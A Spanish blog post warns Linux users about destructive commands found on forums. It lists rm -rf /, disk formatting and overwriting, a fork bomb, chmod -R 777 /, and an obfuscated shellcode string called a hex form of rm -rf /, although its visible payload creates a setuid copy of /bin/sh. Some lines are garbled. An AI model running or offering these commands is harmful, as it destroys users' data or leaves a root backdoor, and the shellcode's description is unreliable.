Comandos peligrosos

Días atrás me encontraba investigando sobre algunos comandos que necesitaba utilizar para un proyecto de investigación de la Universidad. Durante la búsqueda me encontré con un “blog” que advertía sobre algunos comandos peligrosos en Linux, este articulo me llamó mucho la atención y quise compartirles esta valiosa información con ustedes.
Muchas veces cuando empezamos a utilizar un sistema operativos o estamos iniciando a manejar alguna aplicación, empezamos a experimentar, a instalar, a manipular archivos sin conocer el origen de estos. Hacemos esto porque es común que visitemos blogs, grupos o chats en busca de una solución a algún problema al que nos hayamos topado y nos guiamos de los comentarios y sugerencias que estos nos ofrecen. Pero pueden existir personas que no tienen las mejores intenciones en ayudarnos, sino desean hacer daño a través de ese consejo o comentario que realizaron. Lo que puede poner en riesgo nuestra información e incluso el bienestar de nuestra computadora.
A continuación les presento una lista de estos comando para que los tengan en cuenta y no los vayan a ejecutar por equivocación.

rm -rf /

En versión hexadecimal

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;


Elimina de forma recursiva y forzada todos los archivos y directorios almacenados en la partición raíz o carpeta indicada.

mkfs.ext3 /dev/sda

mkfs.extensión /dispositivo 

Formatea todo el contenido del dispositivo indicado

:(){:|:&};:


Conocido como Bomba fork, esta linea de comando ejecuta gran cantidad de procesos hasta que el sistema se bloque.

mv ~/* /dev/null

mv /home/tucarpetaprincipal/* /dev/null

Moverá todos los archivos almacenados en tu carpeta, a un lugar que no existe; perdiendo de forma definitiva toda tu información.

dd if=/dev/urandom of=/dev/sda


Llenará con datos aleatorios toda la partición indicada.

chmod -R 777 /

Es un comando muy conocido, este le otorgará permisos a todo el sistema. Dejando nuestra PC vulnerable a posibles ataques.

rm /bin/initcd / ;

find -iname init -exec rm -rf {} ;

Este comando elimina todos los archivos que contengan la palabra ‘init’.
A si como estos, existen muchos otros que son utilizados para realizar tareas avanzadas y por usuarios que tienen un amplio conocimiento en el manejo de estos.
Es por eso que debemos ser cautelosos a la hora de ejecutar cualquier comando, script o aplicación que no conozcamos y preferiblemente no ejecutarlos como usuario root sino conocemos para que sirven.

Sobre El Autor

Somos Tecnomenia! Tecnología en buen panameño. Fácil, sencilla y sin complicaciones. Lo que quieres saber de la forma en la que lo quieres leer ;)

Hacer Comentario

Su dirección de correo electrónico no será publicada.